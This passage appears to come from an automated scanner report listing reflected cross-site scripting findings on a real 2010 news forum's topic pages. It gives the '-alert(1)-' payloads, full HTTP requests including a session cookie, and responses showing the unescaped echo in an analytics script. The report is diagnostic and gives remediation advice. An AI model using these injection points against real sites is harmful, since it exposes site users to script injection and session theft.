   s.prop4=s.prop3 + " / topic/645-sri-lanka-and-thailand-9-1-2010?9b712"-alert(1)-"c150a5b4989=1";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCi
...[SNIP]...

3.94. http://forums.mercurynews.com/topic/about-gold-price-and-inflation [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/about-gold-price-and-inflation

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b094c"-alert(1)-"6bbb6d77a1d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topicb094c"-alert(1)-"6bbb6d77a1d/about-gold-price-and-inflation HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:22 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:46 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
anguage="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topicb094c"-alert(1)-"6bbb6d77a1d/about-gold-price-and-inflation";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=
...[SNIP]...

3.95. http://forums.mercurynews.com/topic/about-gold-price-and-inflation [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/about-gold-price-and-inflation

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cfbe9"-alert(1)-"886bc9b8793 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/about-gold-price-and-inflationcfbe9"-alert(1)-"886bc9b8793 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:27 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:51 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
f s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topic/about-gold-price-and-inflationcfbe9"-alert(1)-"886bc9b8793";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCiQu
...[SNIP]...

3.96. http://forums.mercurynews.com/topic/about-gold-price-and-inflation [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/about-gold-price-and-inflation

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8247c"-alert(1)-"6f9bb8c880e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/about-gold-price-and-inflation?8247c"-alert(1)-"6f9bb8c880e=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:07:09 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:33 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 95450

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topic/about-gold-price-and-inflation?8247c"-alert(1)-"6f9bb8c880e=1";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCi
...[SNIP]...

3.97. http://forums.mercurynews.com/topic/al-qaida-is-us-puppet [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/al-qaida-is-us-puppet

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6ef8c"-alert(1)-"b016d693cff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic6ef8c"-alert(1)-"b016d693cff/al-qaida-is-us-puppet HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:14 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:38 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
anguage="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topic6ef8c"-alert(1)-"b016d693cff/al-qaida-is-us-puppet";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageNam
...[SNIP]...

3.98. http://forums.mercurynews.com/topic/al-qaida-is-us-puppet [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/al-qaida-is-us-puppet

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9afde"-alert(1)-"410d6a4b262 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/al-qaida-is-us-puppet9afde"-alert(1)-"410d6a4b262 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:27 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:51 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topic/al-qaida-is-us-puppet9afde"-alert(1)-"410d6a4b262";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCiQu
...[SNIP]...

3.99. http://forums.mercurynews.com/topic/al-qaida-is-us-puppet [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/al-qaida-is-us-puppet

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83c90"-alert(1)-"f57460e9cf9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/al-qaida-is-us-puppet?83c90"-alert(1)-"f57460e9cf9=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:07:09 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:33 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 98974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
f (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topic/al-qaida-is-us-puppet?83c90"-alert(1)-"f57460e9cf9=1";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCi
...[SNIP]...

3.100. http://forums.mercurynews.com/topic/bp-oil-spill-was-created-to-push-war-on-iran [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/bp-oil-spill-was-created-to-push-war-on-iran

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d738f"-alert(1)-"6fbedbd10eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response. The modified path produces a 404 response, but the error page includes the same analytics script, so the payload is still executed.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topicd738f"-alert(1)-"6fbedbd10eb/bp-oil-spill-was-created-to-push-war-on-iran HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:12 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:36 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
anguage="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topicd738f"-alert(1)-"6fbedbd10eb/bp-oil-spill-was-created-to-push-war-on-iran";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURC
...[SNIP]...

3.101. http://forums.mercurynews.com/topic/bp-oil-spill-was-created-to-push-war-on-iran [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/bp-oil-spill-was-created-to-push-war-on-iran

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e2ed"-alert(1)-"68b78d5cb8c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/bp-oil-spill-was-created-to-push-war-on-iran1e2ed"-alert(1)-"68b78d5cb8c HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:21 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:45 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
ned') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topic/bp-oil-spill-was-created-to-push-war-on-iran1e2ed"-alert(1)-"68b78d5cb8c";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCiQu
...[SNIP]...

3.102. http://forums.mercurynews.com/topic/bp-oil-spill-was-created-to-push-war-on-iran [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/bp-oil-spill-was-created-to-push-war-on-iran

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbc8e"-alert(1)-"7edf3fe785f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/bp-oil-spill-was-created-to-push-war-on-iran?dbc8e"-alert(1)-"7edf3fe785f=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:07:00 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:24 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 32485

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
ed') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topic/bp-oil-spill-was-created-to-push-war-on-iran?dbc8e"-alert(1)-"7edf3fe785f=1";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCi
...[SNIP]...

3.103. http://forums.mercurynews.com/topic/ferret-theory-lv [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/ferret-theory-lv

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e534b"-alert(1)-"d6330c89b46 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topice534b"-alert(1)-"d6330c89b46/ferret-theory-lv HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:02 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:26 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
anguage="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topice534b"-alert(1)-"d6330c89b46/ferret-theory-lv";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s
...[SNIP]...

3.104. http://forums.mercurynews.com/topic/ferret-theory-lv [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/ferret-theory-lv

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf2d6"-alert(1)-"4e7735b0a0d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/ferret-theory-lvcf2d6"-alert(1)-"4e7735b0a0d HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:12 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:36 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
pt">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topic/ferret-theory-lvcf2d6"-alert(1)-"4e7735b0a0d";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCiQu
...[SNIP]...

3.105. http://forums.mercurynews.com/topic/ferret-theory-lv [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/ferret-theory-lv

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7fe24"-alert(1)-"022a6eab7a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/ferret-theory-lv?7fe24"-alert(1)-"022a6eab7a3=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:06:51 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:15 GMT
